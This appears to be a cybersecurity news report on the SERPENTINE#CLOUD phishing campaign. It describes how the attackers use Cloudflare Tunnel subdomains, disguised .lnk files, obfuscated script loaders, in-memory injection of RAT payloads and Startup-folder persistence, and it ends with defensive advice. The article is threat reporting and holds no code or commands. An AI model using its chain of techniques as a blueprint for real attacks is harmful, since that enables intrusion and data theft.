Hackers Exploit Cloudflare Tunnels to Infect Windows Systems With Python Malware

A sophisticated malware campaign dubbed SERPENTINE#CLOUD has emerged, leveraging Cloudflare Tunnel infrastructure to deliver Python-based malware to Windows systems across Western nations, including the United States, United Kingdom, and Germany.

This ongoing operation, characterized by its use of obfuscated scripts and memory-injected payloads, demonstrates an alarming evolution in threat actor tactics, exploiting trusted cloud services to bypass network defenses and maintain anonymity.

The campaign, which primarily targets users via phishing emails themed around fake invoices, uses a complex, multi-stage infection chain designed for stealth and persistence, posing significant challenges to traditional endpoint security solutions.

Multi-Stage Attack Chain Evades Traditional Defenses

The attack begins with malicious shortcut files (.lnk) disguised as PDF documents, often delivered through zipped attachments in phishing emails.

These files, crafted to appear benign with custom icons, silently execute commands via cmd.exe to fetch remote payloads over WebDAV using Cloudflare’s trycloudflare[.]com subdomains.

According to Securonix Report, this initial access method marks a shift from earlier tactics involving .url files and simplistic .bat scripts, reflecting growing sophistication as the attackers adapt to evade detection by email filters and user scrutiny.

Once executed, the .lnk files download subsequent stages, including obfuscated Windows Script Files (.wsf) and batch scripts (.bat), which serve as loaders for Python-based malware.

These scripts are heavily encoded utilizing techniques like UTF16-LE encoding and character substitution to obscure their intent, ultimately deploying shellcode that injects a Donut-packed PE payload directly into memory, avoiding disk-based detection.

Sophisticated SERPENTINE#CLOUD Campaign

A standout feature of SERPENTINE#CLOUD is its abuse of Cloudflare Tunnels, a service intended for developers to expose local servers temporarily.

By hosting payloads on dynamic, ephemeral subdomains, attackers eliminate the need for traditional infrastructure like VPS servers or registered domains, complicating takedown efforts and attribution.

The use of HTTPS and WebDAV over SSL further encrypts payload delivery, evading deep packet inspection and network intrusion detection systems.

Additionally, the campaign employs Early Bird APC injection to execute shellcode within legitimate processes like notepad.exe, ensuring stealthy operation.

Final-stage Python payloads, obfuscated with tools like Kramer, decrypt RC4-encrypted shellcode in memory, often leading to the deployment of RATs such as AsyncRAT or RevengeRAT, granting attackers full command-and-control over infected systems for data exfiltration or lateral movement.

Persistence is achieved through scripts dropped in the Windows Startup folder, including .vbs files that mimic earlier attack stages and keep systems active by simulating user input.

The campaign’s focus on Western targets, coupled with English-language code comments, hints at a sophisticated actor testing scalable delivery mechanisms.

Cybersecurity experts recommend heightened vigilance against unsolicited attachments, enabling file extension visibility, and monitoring unusual Python executions or traffic to Cloudflare subdomains.

Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates